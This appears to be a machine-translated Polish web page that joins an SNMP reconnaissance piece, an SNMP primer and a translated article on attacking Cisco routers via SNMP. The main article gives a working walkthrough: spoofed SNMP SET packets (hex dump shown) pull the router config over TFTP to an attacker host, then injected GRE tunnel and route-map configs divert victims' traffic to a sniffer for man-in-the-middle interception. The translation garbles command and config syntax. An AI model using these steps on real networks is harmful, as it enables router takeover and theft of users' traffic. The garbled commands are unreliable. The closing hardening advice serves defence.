-DNS-
- Czas odpowiedzi -
-Sprzedawca-
- SystemOpis - może służyć jako dodatkowa, przydatna informacja w atakach
- wspólnota-snmp-społeczność, z którą pozyskaliśmy informacje
- Lokalizacja - możesz znaleźć adres, numer telefonu abonenta
- Kontakt - możesz poznać imię, pseudonim administratora
- Czas ostatniego rozruchu -
- Interfejsy - im więcej, tym ciekawiej
-Stan odkrycia-
Z otrzymanych danych korzystamy z adresów IP i programu Real-time Network Monitor, aby dowiedzieć się, które przydatna informacja można uzyskać za pomocą dodatkowych zapytań SNMP.
Całkiem możliwe jest również zdobycie pełny dostęp do maszyny, po prostu zmieniając nazwę społeczności snmp z publicznej na prywatną. Dzięki temu mamy możliwość wysyłania różnych poleceń snmp.
Wynik ataku:
Po tym eksperymencie dowiedzieliśmy się, że:
Nawet nie używany najprostsza metoda ochrona - listy dostępowe
Możesz łatwo sprawdzić liczbę klientów dostawcy
Informacje poufne klientów dostawcy
Potencjał ekonomiczny dostawcy
Przydatne informacje, które można wykorzystać w różnych atakach
- możesz łatwo zbierać statystyki dostawcy i jego klientów korporacyjnych, z możliwością dalszego ich wykorzystania w określonych celach
- Czy można zapobiec atakowi? Metody ochrony
Czasami niektóre rzeczy nie są tym, czym się wydają. Kiedy masz do czynienia z SNMP (lub innymi protokołami opartymi na UDP), zawsze powinieneś być świadomy zakamarków, które, jeśli zostaną przeoczone, mogą zagrozić Twojej sieci.
Metody ochrony są niezwykle proste. Są całkowicie zależni od administratorów sieci:
Nie zostawiaj domyślnych ustawień sprzętowych (domyślnie)
Prawidłowo przemyśl schemat korzystania z protokołu
Zdefiniuj złożone nazwy społeczności snmp
Użyj list dostępu
Określ pojedyncze adresy IP na listach dostępu, a nie zakresy IP (zakresy IP)
- Wniosek
Celem pracy było pokazanie nie tyle skuteczności opisywanego ataku, ile potencjalnych luk w protokołach opartych na UDP. To w żaden sposób nie oznacza, że sprzęt Cisco/ZyXel jest niebezpieczny. Właściwa konfiguracja powinna zminimalizować szanse na obejście ochrony. Błędy administratorów sieci są głównymi przyczynami kompromitacji sprzętu sieciowego.
SNMP jest protokołem warstwy aplikacji zaprojektowanym dla stosu TCP/IP, chociaż istnieją implementacje dla innych stosów, takich jak IPX/SPX. Protokół SNMP służy do uzyskiwania informacji z urządzeń sieciowych o ich stanie, wydajności i innych cechach, które są przechowywane w MIB (Management Information Base). Prostota SNMP jest w dużej mierze zdeterminowana przez prostotę baz MIB SNMP, zwłaszcza ich wczesnych wersji MIB I i MIB II. Ponadto sam protokół SNMP jest również dość prosty.
Agent w protokole SNMP jest elementem przetwarzającym, który zapewnia menedżerom znajdującym się na stacjach zarządzających siecią dostęp do wartości zmiennych MIB i tym samym umożliwia im realizację funkcji zarządzania i monitorowania urządzeń.
Główne operacje zarządzania są umieszczone w menedżerze, a agent SNMP najczęściej pełni rolę pasywną, na żądanie przenosząc wartości zgromadzonych zmiennych statystycznych do menedżera. W takim przypadku urządzenie działa z minimalnym narzutem na utrzymanie protokołu kontrolnego. Wykorzystuje prawie całą swoją moc obliczeniową do wykonywania swoich podstawowych funkcji routera, mostu lub koncentratora, a agent zbiera statystyki i wartości zmiennych stanu urządzeń i przekazuje je menedżerowi systemu zarządzania.
SNMP- to taki protokół jak "żądać odpowiedzi", co oznacza, że dla każdego żądania otrzymanego od menedżera agent musi wysłać odpowiedź. Cechą protokołu jest jego niezwykła prostota - zawiera tylko kilka poleceń.
Komenda Get-request jest używana przez menedżera do pobrania wartości obiektu od agenta według jego nazwy.
Komenda GetNext-request jest używana przez menedżera do pobrania wartości następnego obiektu (bez określania jego nazwy) podczas iteracji przez tabelę obiektów.
Za pomocą polecenia Get-response agent SNMP wysyła do menedżera odpowiedź na polecenie Get-request lub GetNext-request.
Komenda Set jest używana przez zarządcę do zmiany wartości obiektu. Za pomocą polecenia Set urządzenie jest faktycznie sterowane. Agent musi zrozumieć znaczenie wartości obiektu, który służy do zarządzania urządzeniem i na podstawie tych wartości wykonać rzeczywistą akcję kontrolną - wyłączyć port, przypisać port do konkretnego VLANu itp. Polecenie Set nadaje się również do ustawienia warunku, w którym agent SNMP powinien wysłać odpowiednią wiadomość do menedżera. Można zdefiniować reakcje na zdarzenia, takie jak inicjowanie agenta, restart agenta, utrata łącza, przywracanie łącza, nieprawidłowe uwierzytelnianie i utrata najbliższego routera. Jeśli wystąpi którekolwiek z tych zdarzeń, agent inicjuje przerwanie.
Komenda Trap jest używana przez agenta do powiadamiania menedżera o wystąpieniu wyjątku.
SNMP v.2 dodaje do tego zestawu polecenie GetBulk, które umożliwia menedżerowi pobieranie wielu wartości zmiennych w jednym żądaniu.
Atak na Cisco przez SNMP
Aleksander Antipow
Matiai Aroni i William M. Hidalgo, przekład Vladimir Kuksenok
Wstęp
Często administratorzy systemu nie znają SNMP. Ze względu na niejasne wyobrażenie o przeznaczeniu tego protokołu, a co za tym idzie nieznajomość potencjalnych problemów, często pomija się kwestie bezpieczeństwa.Możesz być zaskoczony, gdy po raz pierwszy zobaczysz dane wyjściowe narzędzia takiego jak SNMP-Enum Philipa Waeytensa działającego na Windows 2000 Server z włączoną usługą SNMP. Zebrane informacje mogą być bardzo kłopotliwe. Administrator systemu i dać wyobrażenie o bogatych możliwościach SNMP.
Fakt, że SNMP jest oparty na UDP, czyni go jeszcze bardziej interesującym. Jako protokół bezpołączeniowy, UDP jest podatny na ataki IP spoofing. Jeśli Twoja organizacja ma routery Cisco, możesz sprawdzić, co możesz z nimi zrobić za pomocą protokołu SNMP.
Scenariusz ataku
Spójrz na przykładowy scenariusz ataku pokazany na rysunku 1.Rysunek 1. Przykład scenariusza ataku.
Zapoznaj się ze scenariuszem ataku. Poniżej znajduje się aktualna konfiguracja zaatakowanego routera (Victim Router):
Aktualna konfiguracja: 1206 bajtów ! wersja 12.3 ! nazwa hosta Ofiara ! włącz sekret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0 ! interfejs Ethernet0/0 adres ip dhcp ip nat poza half-duplex ! interfejs Ethernet0/1 adres ip 192.168.1.1 255.255.255.0 ip nat wewnątrz half-duplex ! router zgrywanie sieci 192.168.1.0 ! ip nat wewnątrz listy źródeł 102 interfejs Ethernet0/0 przeciążenie brak ip serwer http bezklasowy ip ! access-list 1 allow 192.168.1.0 0.0.0.255 access-list 102 allow ip dowolna ! snmp-server społeczność publiczny RO snmp-server społeczność prywatny RW 1 snmp-server włącz pułapki tty ! line con 0 logowanie synchroniczne logowanie line aux 0 line vty 0 4 hasło tajne logowanie ! ! koniec
Zwróć uwagę na regułę dostępu dla grupy RW. Ta reguła próbuje ograniczyć dostęp SNMP do odczytu/zapisu tylko do użytkowników w sieci lokalnej (192.168.1.0).
Istnieją dwa główne etapy ataku:
- Pomiń reguły dostępu SNMP na zaatakowanym routerze w celu uzyskania dostępu do pliku konfiguracyjnego routera.
- Utworzenie tunelu GRE pomiędzy zaatakowanym routerem a routerem hakera w celu zdalnego przechwytywania ruchu atakowanej maszyny klienckiej (Victim Client).
Teoria
Jak wspomniano w artykule „Exploiting Cisco Routers, Part 1”, za pomocą polecenia SNMP SET można wymusić na routerze Cisco zamianę/wysłanie pliku konfiguracyjnego za pomocą protokołu TFTP.Wysyłając żądanie SNMP SET z fałszywym adresem IP (z zakresu opisanego w RFC1918 - 192.168.1.0), musimy zmusić atakowany router do wysłania nam swojego pliku konfiguracyjnego. Zakłada to, że znamy „ciąg społeczności prywatnej” i listy ACL opisane w ciągu konfiguracyjnym grupy RW.
Pomiń reguły dostępu SNMP
Zacznijmy od stworzenia fałszywego żądania SNMP. Używając małego skryptu Perla i Ethereala, przechwycimy standardowe żądanie "kopiowania konfiguracji" SNMP SET, którego użyjemy jako naszego pakietu podstawowego. [e-mail chroniony]# ./copy-router-config.pl ####################################### # ############# # Kopiowanie konfiguracji routera Cisco - Korzystanie z SNMP # Zhakowanie przez muts - [e-mail chroniony]################################################## # ##### Sposób użycia: ./cisco-copy-config.pl Upewnij się, że skonfigurowany jest serwer TFTP, najlepiej działający z /tmp ! [e-mail chroniony]# Po wykonaniu skryptu zostanie przechwycony pakiet SNMP podobny do pokazanego na rysunku 2. Zgodnie z oczekiwaniami, żądanie to zostało odrzucone przez router, a plik konfiguracyjny nie został wysłany.Rysunek 2. Przechwycony pakiet SNMP.
Zwróć uwagę na adres IP atakującego (80.179.76.227). Teraz za pomocą edytora szesnastkowego zmienimy ten adres IP i kilka innych pól w nagłówku pakietu. W notacji szesnastkowej sfałszowany adres IP 192.168.1.5 wygląda jak C0 A8 01 05, co pokazano na rysunku 3.
Rysunek 3. Zmiana zwrotnego adresu IP pakietu.
Następnie wyślemy pakiet za pomocą file2cable (lub dowolnego innego generatora pakietów):
[e-mail chroniony]:~# file2cable -v -i eth0 -f /root/snmp-mod file2cable - przez FX Dzięki udaj się do Lamont Granquist i fyodor za ich hexdump() /root/snmp-mod - 238 bajtów surowych danych 000f 347c 501f 0006 1bcc 00fa 0800 4500 ..4|P.........E. 00e0 0000 4000 4011 35bd c0a8 0105 d4c7 [e-mail chroniony]@.5.......91f2 8000 00a1 00cc 052e 3081 c102 0100 ..........0.....0407 7072 6976 6174 65a3 81b2 0203 00d6 ..prywatne..... .. 9b02 0100 0201 0030 81a4 3016 0611 2b06 .......0..0...+. 0104 0109 0960 0101 0101 0283 f1b0 7802 .....`........x. 0101 3016 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0383 f1b0 7802 0104 3016 0611 2b06 ......x...0...+. 0104 0109 0960 0101 0101 0483 f1b0 7802 .....`........x. 0101 3019 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0583 f1b0 7840 0450 b34c e330 2706 [e-mail chroniony] 112b 0601 0401 0909 6001 0101 0106 83f1 .+......`...... b078 0412 7077 6e64 2d72 6f75 7465 722e .x..pwnd-router. 636f 6e66 6964 3016 0611 config0... +..... 0960 0101 0101 0e83 f1b0 7802 0104 .`........x... Długość pakietu: 238 [e-mail chroniony]:~# Następnie nasz serwer TFTP zaakceptuje połączenie, którego dziennik Ethereal jest pokazany na rysunku 4.
Rysunek 4. Połączenie z serwerem TFTP przechwycone przez Ethereal.
Zanotuj odwrotny adres IP pakietu SNMP i żądania zapisu TFTP (pakiety 1 i 2). Pakiet omija reguły dostępu SNMP i poprzez TFTP otrzymujemy plik konfiguracyjny zaatakowanego routera.
Tunel GRE
GRE (Generic Routing Encapsulation) to protokół tunelowania zaprojektowany do enkapsulacji dowolnych typów pakietów warstwy sieciowej w pakiecie warstwy sieciowej. Jedną z opcji korzystania z GRE jest łączenie segmentów sieci IPX za pośrednictwem kanału komunikacyjnego, który obsługuje tylko warstwę sieciową modelu OSI. W takim przypadku konieczne będzie utworzenie tunelu GRE z jednego routera do drugiego, aby przesyłać pakiety IPX tam iz powrotem przez łącze tylko IP.
Będziemy jednak używać GRE do celów innych niż jego zwykły cel. Nasz plan jest następujący:
- Utwórz tunel GRE z zaatakowanego routera do routera hakera.
- Określ, jaki ruch będzie przechodził przez tunel.
- Rozpakuj pakiety GRE pochodzące z atakowanego routera i przekaż je do komputera atakującego (sniffera) w celu analizy.
Zaatakowany router
Musimy stworzyć tunel GRE na zaatakowanym routerze. Ponieważ nie mamy dostępu do terminala (konsoli), możemy po prostu edytować powstały plik konfiguracyjny, a następnie odesłać go z powrotem do routera za pomocą fałszywego żądania SNMP SET. Dodaj następujące wiersze do pliku konfiguracyjnego zaatakowanego routera: interface tunnel0 adres ip 192.168.10.1 255.255.255.0 tunel źródło Ethernet0/0 tunel docelowy tryb tunelu gre ip Oznaczają one:- Stworzyliśmy interfejs tunel0 i określiliśmy adres IP z sieci 192.168.10.x. Aby się komunikować, oba końce tunelu muszą znajdować się w tej samej podsieci.
- Wskazaliśmy, że interfejs Ethernet0/0 jest początkiem tunelu (inaczej od czego tunel mógłby się zaczynać?)
- Końcem tunelu jest adres IP zewnętrznego interfejsu routera hakera.
- Ostatnia komenda jest opcjonalna, ponieważ tunel GRE i tak jest tworzony domyślnie (ale dodaliśmy go dla pewności).
Aby to zrobić, dodaj jeszcze kilka linijek do pliku konfiguracyjnego atakowanego routera:
Lista dostępu 101 allow tcp dowolna dowolna eq 443 lista dostepowa 101 allow tcp dowolna eq 80 lista dostepowa 101 allow tcp dowolna kad. access-list 101 allow tcp any any eq 25 access-list 101 allow tcp any any eq 110 Zezwoliliśmy na transfer danych przez protokoły SSL, HTTP, FTP, telnet, SMTP i POP3.
Teraz, jeśli ruch będzie zgodny z opisanymi powyżej regułami, zostanie przekierowany zgodnie z mapami routingu, których opis należy dodać do pliku konfiguracyjnego:
Router-map divert-traffic match adres ip 101 set ip next-hop 192.168.10.2 interfejs Ethernet0/0 ip policy route-map divert-traffic Ten wpis ma następujące znaczenie:
- Określiliśmy nazwę mapy routingu (divert-traffic), a następnie użyliśmy polecenia „match”, aby określić, że jako warunek dopasowania ma być użyty zestaw reguł dostępu 101 (lista dostępu).
- Jako adres następnego przeskoku określiliśmy adres IP atakującego.
- Mapę routingu zastosowaliśmy do zewnętrznego interfejsu LAN zaatakowanej maszyny. Wynikiem tego będzie monitorowanie całego przychodzącego i wychodzącego ruchu Ethernet0/0.
haker router
Konfiguracja routera atakującego jest nieco bardziej skomplikowana, ponieważ musimy zdefiniować dwie mapy routingu - jedną do przekazywania ruchu do komputera atakującego (sniffer), a drugą do odsyłania ruchu z powrotem do zaatakowanego routera. Bardzo ważne jest, abyśmy przesyłali tunelowane dane z powrotem do zaatakowanego routera, aby atakowany komputer (Victim Client) nie utracił połączenia.
Zacznijmy od utworzenia tunelu GRE na routerze atakującego: Attacker(config)# interface tunnel0 Attacker(config-if)# adres ip 192.168.10.2 255.255.255.0 Attacker(config-if)# źródło tunelu Ethernet0/0 Attacker(config- if)# miejsce docelowe tunelu Atakujący(config-if)# tryb tunelu gre ip Atakujący(config)# access-list 101 allow ip any any Atakujący(config)# router-map divert-to-sniffer Atakujący(config-route-map) # dopasuj adres ip 101 Attacker(config-route-map)# ustaw ip next-hop 192.168.3.5 Attacker(config-route-map)# exit Attacker(config)# interface tunnel0 Attacker(config-if)# ip policy route- mapa skierowana do sniffera Te zasady mają następujące znaczenie:
- Stworzyliśmy regułę dostępu, która zezwala na wszystkie rodzaje ruchu.
- Stworzyliśmy mapę routingu przekierowania do sniffera (ta mapa routingu przekieruje ruch tunelowany do sniffera).
- Utworzona reguła dostępu jest używana jako warunek dopasowania.
- Jako adres następnego skoku określiliśmy adres IP atakującego (sniffera).
- Zastosowaliśmy mapę routingu do interfejsu tunnel0.
Na koniec stwórzmy mapę routingu i skojarzmy ją z interfejsem Ethernet0/0:
Attacker(config-if)# route-map divert-out Attacker(config-route-map)# match adres ip 101 Attacker(config-route-map)# set ip next-hop 192.168.10.1 Attacker(config-route-map )# exit Attacker(config)# interface ethernet0/0 Attacker(config-if)# ip policy route-map divert-out Te dodatkowe ustawienia oznaczają:
- Gdy atakujący (sniffer) przechwyci i prześle z powrotem tunelowane dane, mapa routingu przekierowania przekieruje ruch z powrotem do zaatakowanego routera.
- Zastosowaliśmy mapę routingu do interfejsu Ethernet.
Atakujący (szperacz)
Po skonfigurowaniu routerów musimy skonfigurować komputer atakującego (sniffer) do przechwytywania i przekierowywania danych. Ważne jest, aby komputer był skonfigurowany do odwrotnego przekazywania pakietów. Aby to zrobić, możesz użyć jednego z następujących poleceń: [e-mail chroniony]:~# echo 1 > /proc/sys/net/ipv4/ip_forward lub [e-mail chroniony]:~# fragrouter -B1 Bez przekierowania nasz atak spowoduje odmowę usługi (DoS) na zaatakowanym komputerze, przez co będzie bez znaczenia.Zacznijmy atak
Po zakończeniu wszystkich ustawień pozostaje nam tylko wgrać nowy zmodyfikowany plik konfiguracyjny do zaatakowanego routera. Efektem będzie aktywacja tunelu GRE i przekierowanie całego ruchu z sieci lokalnej zaatakowanego komputera do hakera (sniffera).Musimy utworzyć fałszywe żądanie SNMP SET, które spowoduje, że router pobierze nowy plik konfiguracyjny i doda go do aktualna konfiguracja. Aby otrzymać pakiet podstawowy, ponownie wyślemy zwykłe żądanie:
[e-mail chroniony]# ./merge-router-config.pl ####################################### # ############# # Połącz konfigurację routera Cisco - Korzystanie z SNMP # Hakowanie przez muts - [e-mail chroniony]################################################## # ##### Sposób użycia: ./merge-copy-config.pl Upewnij się, że skonfigurowany jest serwer TFTP, najlepiej działający z /tmp ! [e-mail chroniony]# Przechwyć ten pakiet i zmień zwrotny adres IP oraz kilka innych pól nagłówka pakietu, jak pokazano na rysunku 5.
Rysunek 5. Zmiana nagłówka pakietu.
Po wysłaniu zmodyfikowanego pakietu zostanie utworzone połączenie TFTP z naszym komputerem (Rysunek 6).
Rysunek 6. Łączenie się z serwerem TFTP atakującego.
Zwróć uwagę na żądanie odczytu TFTP (pakiet nr 2). Pakiet omija reguły dostępu SNMP, w wyniku czego nowy zmodyfikowany plik konfiguracyjny jest ładowany i dodawany do bieżącej konfiguracji. Informacje debugowania zaatakowanego routera dostarczają wielu interesujących informacji o przebiegu ataku:
*Mar 1 00:32:53.854: SNMP: Ustaw żądanie, reqid 36323, errstat 0, erridx 0 .76.227 (adres serwera TFTP) ccCopyTable.1.6.12285992 = pwnd-router.config ccCopyTable.1.14.12285992 = 4 *Mar 1 00:32:53,971: SNMP: Response, reqid 36323, errstat 0, erridx 0 ccCopyTable .1.2.12285992 = 1 ccCopyTable.1.3.12285992 = 4 ccCopyTable.1.4.12285992 = 1 ccCopyTable.1.5.12285992 = 80.179. 76.227 (adres serwera TFTP) 1.14.12285992 = 4 *1 marca 00:32:54.291: SNMP: Pakiet wysłany przez UDP do 192.168.1.5 Należy zauważyć, że adres serwera TFTP różni się od adresu IP atakującego i jest przekazywany jako oddzielny parametr. Tunel jest teraz otwarty, gotowy do pracy i można go przedstawić w postaci diagramu na rysunku 7.
Rysunek 7. Tunel GRE.
Możesz sprawdzić, czy tunel działa, wysyłając polecenie debugowania do routera atakującego:
Atakujący# tunel debugowania *3 marca 06:38: Tunnel0: GRE/IP do klasyfikacji 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *3 marca 06:38: Tunnel0: sąsiedztwo fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0 *3 marca 06:38: Tunnel0: GRE/IP do klasyfikacji 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *3 marca 06:38: Tunnel0: poprawka sąsiedztwa, 80.179.20.55 -> 212.199.145.242, tos=0x0g wszystko Załóżmy, że atakowany komputer szukał w Google hasła „GRE Sniffing”, jak pokazano na rysunku 8.
Rysunek 8. Ofiara szuka informacji o tunelach GRE.
W wyniku tych działań Ethereal na komputerze atakującego otrzyma pakiety pokazane na rysunku 9.
Rysunek 9. Sniffer pokazuje żądanie Google dotyczące informacji o tunelach GRE.
Oprócz używania wyspecjalizowanego sniffera (takiego jak dsniff) do przechwytywania haseł w postaci zwykłego tekstu, możemy przeprowadzać wyrafinowane ataki typu man-in-the-middle na komputer ofiary. Ettercap- dobra użyteczność, pozwalając, oprócz przechwytywania różne rodzaje hasła, organizuj atak typu man-in-the-middle na zaszyfrowane Protokoły SSL i SSH. Za pomocą filtrów Ettercap możesz zarządzać i zmieniać ruch przechodzący. Możliwości są prawie nieograniczone.
Wniosek
Czasami niektóre rzeczy nie są tym, czym się wydają. Kiedy masz do czynienia z SNMP (lub innymi protokołami opartymi na UDP), zawsze powinieneś być świadomy zakamarków, które, jeśli zostaną przeoczone, mogą zagrozić Twojej sieci.W opisanym przykładzie dodatkowa reguła dostępu, która wprost określa adres serwera TFTP (znajdującego się na zaatakowanym przez nas routerze) wystarczyłaby, aby udaremnić atak.
Sceptycy mogą zapytać „Skąd atakujący wiedział o regułach dostępu / nazwie SNMP grupy RW?”. Te informacje można uzyskać metodą brute force, nie tylko nazwy grup, ale także rozwiązane adresy IP, a takie narzędzie już istnieje.
Celem artykułu było pokazanie nie tyle skuteczności opisywanego ataku, ile potencjalnych luk w protokołach opartych na UDP. To w żaden sposób nie oznacza, że sprzęt Cisco jest niebezpieczny. Właściwa konfiguracja powinna zminimalizować szanse na obejście ochrony. Błędy popełniane przez administratorów sieci to główne przyczyny kompromisów w sprzęcie Cisco.
Informacje o wzmocnieniu bezpieczeństwa routerów Cisco można znaleźć pod adresem